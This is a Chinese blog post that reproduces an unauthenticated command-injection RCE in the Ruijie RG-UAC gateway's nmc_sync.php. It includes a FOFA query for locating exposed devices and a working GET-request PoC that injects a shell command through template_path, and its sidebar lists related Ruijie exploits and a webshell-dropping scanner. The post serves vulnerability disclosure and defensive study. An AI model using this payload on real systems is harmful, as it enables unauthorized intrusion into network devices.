锐捷RG-UAC应用网关 前台RCE漏洞复现

已于 2023-12-18 12:36:36 修改
阅读量1.5k 收藏 10
点赞数 11
分类专栏: 漏洞复现 文章标签: web安全 安全
于 2023-12-02 22:59:50 首次发布
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/qq_41904294/article/details/134759305
版权
本文介绍了锐捷RG-UAC应用网关存在的未授权命令执行漏洞,详细阐述了漏洞概述、复现环境及复现过程,并提供了厂商的修复建议和访问策略设置。
摘要由CSDN通过智能技术生成

0x01 产品简介

 锐捷RG-UAC系列应用管理网关是锐捷自主研发的应用管理产品。

0x02 漏洞概述

  锐捷RG-UAC应用管理网关 nmc_sync.php 接口处存在命令执行漏洞,未经身份认证的攻击者可执行任意命令控制服务器权限。

0x03 复现环境

FOFA:app="Ruijie-RG-UAC"

d872daf763b24eb9aad5613edf62e8d8.png

0x04 漏洞复现 

PoC

GET /view/systemConfig/management/nmc_sync.php?center_ip=127.0.0.1&template_path=|whoami%20>test.txt|cat HTTP/1.1
Host: your-ip
User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_14_3) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/12.0.3 Safari/605.1.15
Accept-Encoding: gzip

了解本专栏 订阅专栏 解锁全文 超级会员免费看
0xSecl
关注
专栏目录
订阅专栏
漏洞复现锐捷RG-UAC统一上网行为管理系统信息泄露漏洞
晚风不及你
01-08 874
锐捷网络成立于2000年1月,原名实达网络,2003年更名,自成立以来,一直扎根行业,深入场景进行解决方案设计和创新,并利用云计算、SDN、移动互联、大数据、物联网、AI等新技术为各行业用户提供场景化的数字解决方案,助力全行业数字化转型升级。
锐捷校园网自助服务系统 operatorReportorRoamService SQL注入漏洞RCE漏洞复现
0xSec
04-22 1293
锐捷校园网自助服务系统 operatorReportorRoamService 接口存在SQL注入漏洞,未经身份验证的攻击者可以利用此漏洞获取数据库操作权限,进一步利用os-shell可实现远程命令执行,存在服务器被控的风险。
锐捷EWEB网管系统RCE漏洞
最新发布
一个努力学习网安的小牛马
05-11 1046
锐捷网管系统是由北京锐捷数据时代科技有限公司开发的新一代基于云的网络管理软件,以"数据时代创新网管与信息安全"为口号,定位于终端安全、IT运营及企业服务化管理统一解决方案。使用cookie向/flow_control_pi/flwo.control.php?用post请求访问/ddi/server/login.php页面并提交admin参数可以获得管理员的cookie。在该系统的/flow_control_pi/flwo.control.php的文件中存在命令执行参数。
锐捷EWEB网管系统 RCE漏洞复现
0xSec
12-02 3145
Ruijie-EWEB 网管系统 flwo.control.php 中的 type 参数存在命令执行漏洞,攻击者可利用该漏洞执行任意命令,写入后门,获取服务器权限,进而控制整个web服务器。
锐捷 RG-UAC 统一上网行为管理审计系统信息泄露漏洞(CNVD-2021-14536)
Fengxin的博客
11-03 1332
0x01 漏洞描述 锐捷RG-UAC统一上网行为管理审计系统存在账号密码信息泄露,可以间接获取用户账号密码信息登录后台 0x02 漏洞影响 锐捷RG-UAC统一上网行为管理审计系统 0x03 漏洞复现 使用FOFA语句包含关键字查找FOFA语句 title="RG-UAC登录页面" && body="admin" 登录界面 直接CTRL+U查看源代码,搜索password https://www.somd5.com/ 解密MD5加密的password 即可使用admin,密码登录进系
锐捷RG-UAC应用网关nmc_sync.php接口前台RCE
weixin_43567873的博客
03-08 117
锐捷RG-UAC应用网关nmc_sync.php接口前台RCE
锐捷RG-UAC应用网关nmc_sync.php 接口前台RCE(含批量验证poc)
weixin_43567873的博客
04-04 110
锐捷RG-UAC应用网关nmc_sync.php 接口前台RCE(含批量验证poc)
锐捷RG-UAC应用管理网关 online_check.php存在命令注入
weixin_43567873的博客
03-08 622
锐捷RG-UAC应用管理网关 online_check.php存在命令注入
锐捷RG-UAC统一上网行为管理与审计系统管理员密码泄露
weixin_62352348的博客
01-17 469
锐捷RG-UAC统一上网行为管理与审计系统管理员密码泄露
RuijieRCE:锐捷锐捷网络RCE突破检测工具,可批量检测
03-06
自述文件 瑞杰网络RCE漏洞检测工具,为方便渗透测试使用,可以批量检测,也会生成历史记录。同时也为防止他人恶意使用,可自定义GET参数密码,该密码由sha256加密,难以破解。 免责声明 由于传播,利用此文所提供的信息而造成的任何直接或间接的后果及损失,均由使用者本人负责,作者不承担任何责任。 参数 -f string 导入.txt文件批量扫描 -n string 自定义POST木马密码,默认cmd -p string 自定义GET密码验证,默认为cmd -u string 目标URL 使用 检测到防御后生成随机数.php文件执行命令,也可以上菜刀。 普通使用 GET密码:cmd POST密码:cmd ./RuijieRCE -u http://127.0.0.1:4430 设置密码 -n参数为POST密码,-p参数为GET密码这两
CNVD-2021-09650:锐捷NBR路由器(guestIsUp.php)RCE漏洞复现 [附POC]
薛定谔嘚喵博客
11-15 1172
锐捷网络是一家拥有包括交换机、路由器、软件、安全防火墙、无线产品、存储等全系列的网络设备产品线及解决方案的专业化网络厂商。锐捷NBR 路由器系统存在远程命令执行漏洞,攻击者通过漏洞可以获取服务器权限,导致服务器失陷。
锐捷Ruijie-UAC online_check.php 未授权远程代码命令执行漏洞】【漏洞复现】【漏洞poc】
weixin_43977052的博客
03-06 454
锐捷RG-UAC统一上网行为管理审计系统是星网锐捷网络有限公司自主研发的上网行为管理与审计产品。该系统可以部署在网络的关键节点上,通过路由、透明、旁路或混合模式,对数据进行2-7层的全面检查和分析。它深度识别、管控和审计数百种常见的应用,包括IM聊天软件、P2P下载软件、炒股软件、网络游戏应用、流媒体在线视频、移动应用、网络存储等。
可视化管理一目了然 锐捷RG-UAC承载荔湾教育局“御网”之道
weixin_34309543的博客
09-01 231
互联网自诞生之初,就有着虚拟性、交互及时、信息量大等特点,然而就像硬币的另一面,这些特点同时也带来了不少管理上的问题,例如网络暴力、网络谣言、水军等负面现象时有发生,败坏了网络环境甚至会威胁了公民或国家安全。而作为教育城域网管理单位,对于网络中存在的任何一个“危险信号”都应该做到清晰可辨。那么,面对成千上万用户的上网行为管理难题,广州市荔湾区教育局又是如...
锐捷网关 RCE复现
weixin_43227251的博客
04-12 2777
请求路径 /guest_auth/guestIsUp.php 漏洞文件 <?php //查询用户是否上线了 $userip = @$_POST['ip']; $usermac = @$_POST['mac']; if (!$userip || !$usermac) { exit; } /* 判断该用户是否已经放行 * $cmd = '/sbin/app_auth_hook.elf -f ' . $userip; $r.
锐捷某系统前台任意文件写入分析
热门推荐
weixin_43526443的博客
01-20 7万+
文章转自作者瓜皮辰 Part1 前言 这套系统我估计是全网第一个公开能拿shell的吧(不是的话当我没说),哪套系统自己猜,这次先分享下前台任意文件写入,还有几个rce日后分享,也感谢独立团孙德胜Alan提供的思路。 Part2 代码分析 漏洞位置: /view/vpn/autovpn/feature_commit.php 先通过POST传参进入if判断 在下面的fc_extendsubnet处传参即可进入漏洞位置 会将我们传入的参数提交到putConfig...
锐捷RG-UAC敏感信息泄露
qq_44877321的博客
02-14 254
锐捷漏洞复现
锐捷EG易网关login.php以及其后台cli.php/branch_passw.php RCE漏洞复现 [附POC]
薛定谔嘚喵博客
11-16 1142
锐捷网络是一家拥有包括交换机、路由器、软件、安全防火墙、无线产品、存储等全系列的网络设备产品线及解决方案的专业化网络厂商。锐捷EG易网关系统存在远程命令执行漏洞,攻击者通过漏洞可以获取服务器权限,导致服务器失陷。
锐捷rce复现漏洞
计算机毕业论文源码,学生个人网页制作html源码。贴近用户做网络推广和互联网优化。
11-16 1115
锐捷 rce复现,请求路径/guest_auth/guestIsUp.php //锐捷rce复现漏洞 锐捷rce漏洞文件
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包

打赏作者

0xSecl

你的鼓励将是我创作的最大动力

¥1 ¥2 ¥4 ¥6 ¥10 ¥20
扫码支付:¥1
获取中
扫码支付

您的余额不足,请更换扫码支付或充值

打赏作者

实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值